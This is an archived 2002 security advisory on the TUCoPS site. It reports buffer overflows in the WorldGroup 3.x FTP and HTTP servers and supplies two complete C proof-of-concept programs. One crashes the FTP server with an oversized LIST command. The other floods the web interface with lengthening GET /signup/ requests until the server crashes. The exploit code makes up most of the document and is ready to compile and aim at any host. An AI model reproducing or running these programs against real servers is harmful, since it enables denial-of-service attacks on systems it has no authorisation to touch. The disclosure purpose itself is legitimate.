Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Windows Net Apps :: win5152.htm

WorldGroup ftp & http buffer overflows



28th Feb 2002 [SBWID-5152]
COMMAND

	WorldGroup ftp & http buffer overflows

SYSTEMS AFFECTED

	WorldGroup  3.x

PROBLEM

	Limpid Byte team [http://lbyte.void.ru, lbyte@host.sk] reports :
	

	For  FTP  server overflow on long LIST command.
	

	For HTTP overflow on long request :
	

	GET /signup/a.[aaaaaaaa....aaaa] HTTP/1.0

	

	

	 Proof of concept code :

	 =====================

	

	DoS exploits by Limpid Byte team, also available from :
	

	http://www.security.nnov.ru/files/worldgroupdos.zip

	

	

	----------------- BEGIN FTP_DOS.C ---------------------

	/*

	        by Limpid Byte project

	        http://lbyte.void.ru

	        lbyte@host.sk

	

	[Worldgroup FTP Server Denial of Service]

	More than 105 \"/\" in LIST command.

	

	*/

	

	#include <stdio.h>

	#include <stdlib.h>

	#include <string.h>

	#include <winsock.h>

	

	#define FOUND \"220\"

	

	int main(int argc, char *argv[])

	{

	        int sock;

	        struct sockaddr_in blah;

	        struct hostent *he;

	        char cgiBuff[1024];

	        char *cgiPage[6];

	        WSADATA wsaData;

	        char cr[] = \"\\n\";

	

	        if (argc < 3)

	        {

	printf(\"\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\nThis program crash Worldgroup servers 3.xx for windows 95/98/ME/NT/2K.\");

	printf(\"\\n\\rGreets to [WhU]//[GiN]//[LByte]//[WGHACK] projects!\\n\\r  USAGE:\\n\\r\");

	printf(\"Ftp_dos.exe [HOST] [LOGIN] [PASSWORD] \");

	printf(\"\\n\\r example : fpt_dos.exe 127.0.0.1 anonymous anonymous@127.0.0.1 \\n\");

	                exit(1);

	        }

	        cgiPage[0] = \"USER \";

	        cgiPage[1] = (argv[2]);

	        cgiPage[2] = \"PASS \";

	        cgiPage[3] = (argv[3]);

	        cgiPage[4] = \"PASV\";

	        cgiPage[5] = \"LIST */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../\\n\";

	

	        if(WSAStartup(0x101,&wsaData))

	        {

	                printf(\"Unable to initialize WinSock lib.\\n\");

	                exit(1);

	        }

	printf(\"Let\'s crash the World!\\n\\r\");

	printf(\"Coded by the [eaSt]:\\n\\r\");

	printf(\"\\nConnecting %s on port 21...\\n\\n\", argv[1]);

	

	        sock = socket(AF_INET,SOCK_STREAM,0);

	        blah.sin_family=AF_INET;

	        blah.sin_addr.s_addr=inet_addr(argv[1]);

	        blah.sin_port=htons(21);

	        if ((he = gethostbyname(argv[1])) != NULL)

	        {

	                memcpy((char *)&blah.sin_addr, he->h_addr, he->h_length);

	        }

	        else

	        {

	                if ((blah.sin_addr.s_addr = inet_addr(argv[1]))==INADDR_NONE)

	                {

	                WSACleanup();

	                exit(1);

	                }

	        }

	

	        if (connect(sock,(struct sockaddr*)&blah,sizeof(blah))!=0)

	        {

	                WSACleanup();

	                exit(1);

	        }

	        memset(cgiBuff, 0, sizeof(cgiBuff));

	        cgiBuff[recv(sock,cgiBuff,sizeof(cgiBuff) - 1 ,0)] = 0;

	        printf(\"<< %s\", cgiBuff);

	        send(sock,cgiPage[0],strlen(cgiPage[0]),0);

	        send(sock,cgiPage[1],strlen(cgiPage[1]),0);

	        send(sock,cr,1,0);

	        memset(cgiBuff, 0, sizeof(cgiBuff));

	        cgiBuff[recv(sock,cgiBuff,sizeof(cgiBuff) - 1 ,0)] = 0;

	        printf(\">> %s %s\\n<< %s\", cgiPage[0], cgiPage[1], cgiBuff);

	        send(sock,cgiPage[2],strlen(cgiPage[2]),0);

	        send(sock,cgiPage[3],strlen(cgiPage[3]),0);

	        send(sock,cr,1,0);

	        memset(cgiBuff, 0, sizeof(cgiBuff));

	        cgiBuff[recv(sock,cgiBuff,sizeof(cgiBuff) - 1 ,0)] = 0;

	        printf(\">> %s %s\\n<< %s\", cgiPage[2], cgiPage[3], cgiBuff);

	        send(sock,cgiPage[4],strlen(cgiPage[4]),0);

	        send(sock,cr,1,0);

	        memset(cgiBuff, 0, sizeof(cgiBuff));

	        cgiBuff[recv(sock,cgiBuff,sizeof(cgiBuff) - 1 ,0)] = 0;

	        printf(\">> %s\\n<< %s\", cgiPage[4], cgiBuff);

	        send(sock,cgiPage[5],strlen(cgiPage[5]),0);

	        send(sock,cr,1,0);

	        memset(cgiBuff, 0, sizeof(cgiBuff));

	        cgiBuff[recv(sock,cgiBuff,sizeof(cgiBuff) - 1 ,0)] = 0;

	        printf(\">> %s\\n<< %s\", cgiPage[5], cgiBuff);

	

	        printf(\"Try reconnect to %s\\n\", argv[1]);

	        WSACleanup();

	        return 0;

	}

	-----------------  END FTP_DOS.C  ---------------------

	

	----------------- BEGIN WWW_DOS.C ---------------------

	/*

	        by Limpid Byte project

	        http://lbyte.void.ru

	        lbyte@host.sk

	

	Worldgroup Server Denial of Service for

	Windows 9x/ME only.

	Error between system fuction windows and

	worldgroup from web interface.

	REGUEST:

	GET /signup/a.[aaaaaaaa....aaaa]

	

	*/

	

	#include <stdio.h>

	#include <stdlib.h>

	#include <string.h>

	#include <winsock.h>

	

	#define FOUND \"200\"

	

	int main(int argc, char *argv[])

	{

	        int sock, count;

	        struct sockaddr_in blah; 

	        struct hostent *he;

	        char cgiBuff[1024];

	        WSADATA wsaData;

	

	        if (argc < 2)

	        {

	                printf(\"\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\nThis program crash Worldgroup servers 3.20 for windows 95/98/ME.\\n\");

	                printf(\"Greets to [WhU]//[GiN]//[LByte]//[WGHACK] projects!\\n\\n\");

	                printf(\" USAGE   : www_dos.exe [HOST] \\n\");

	                printf(\" example : www_dos.exe 127.0.0.1 \\n\");

	                exit(1);

	        }

	

	        if(WSAStartup(0x101,&wsaData))  

	        {

	                printf(\"Unable to initialize WinSock lib.\\n\"); 

	                exit(1);   

	        }

	        printf(\"Let\'s crash the World!\\n\");

	        printf(\"Coded by the [eaSt]:\\n\");

	        printf(\"\\nScanning %s on port 80...\\n\\n\", argv[1]);

	

	        for (count = 0; count < 94; count++)

	        {

	                sock = socket(AF_INET,SOCK_STREAM,0);

	                blah.sin_family=AF_INET;

	                blah.sin_addr.s_addr=inet_addr(argv[1]);

	                blah.sin_port=htons(80);

	                if ((he = gethostbyname(argv[1])) != NULL)

	                {

	                        memcpy((char *)&blah.sin_addr, he->h_addr, he->h_length);

	                }

	                else

	                {

	                        if ((blah.sin_addr.s_addr = inet_addr(argv[1]))==INADDR_NONE)

	                    {

	                                WSACleanup();

	                                exit(1);

	                        }

	                }

	

	                if (connect(sock,(struct sockaddr*)&blah,sizeof(blah))!=0)

	                {

	                        WSACleanup();

	                        exit(1);

	                }

	

	                memset(cgiBuff, 0, sizeof(cgiBuff));

	                sprintf(cgiBuff, \"GET /signup/\");

	                memset(cgiBuff + 12, \'a\', 219 + count);

	                sprintf(cgiBuff + 12 + 219 + count, \".txt?=../test.txt HTTP/1.0\\n\\n\");

	                printf(\"Sending: %d symbols request\\n\", strlen(cgiBuff));

	

	                send(sock,cgiBuff,strlen(cgiBuff),0);

	                memset(cgiBuff, 0, sizeof(cgiBuff));

	                if(!recv(sock,cgiBuff,sizeof(cgiBuff),0)) {

	                        printf(\"Crashed\\n\");

	                }

	                else {

	                        cgiBuff[32] = 0;

	                        if (strstr(cgiBuff,FOUND))

	                        {

	                                printf(\"Send (%s)\\n\", cgiBuff);

	                        }

	                        else

	                        {

	                                printf(\"Not Found (%s)\\n\", cgiBuff);

	                        }

	                }

	

	                closesocket(sock);

	        }

	

	        printf(\"Try reconnect to %s\\n\", argv[1]);

	        WSACleanup();

	        return 0;

	}

	-----------------  END WWW_DOS.C  ---------------------

	

	

SOLUTION

	Patch not available yet. Check :
	

	http://www.gcomm.com

	

	


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH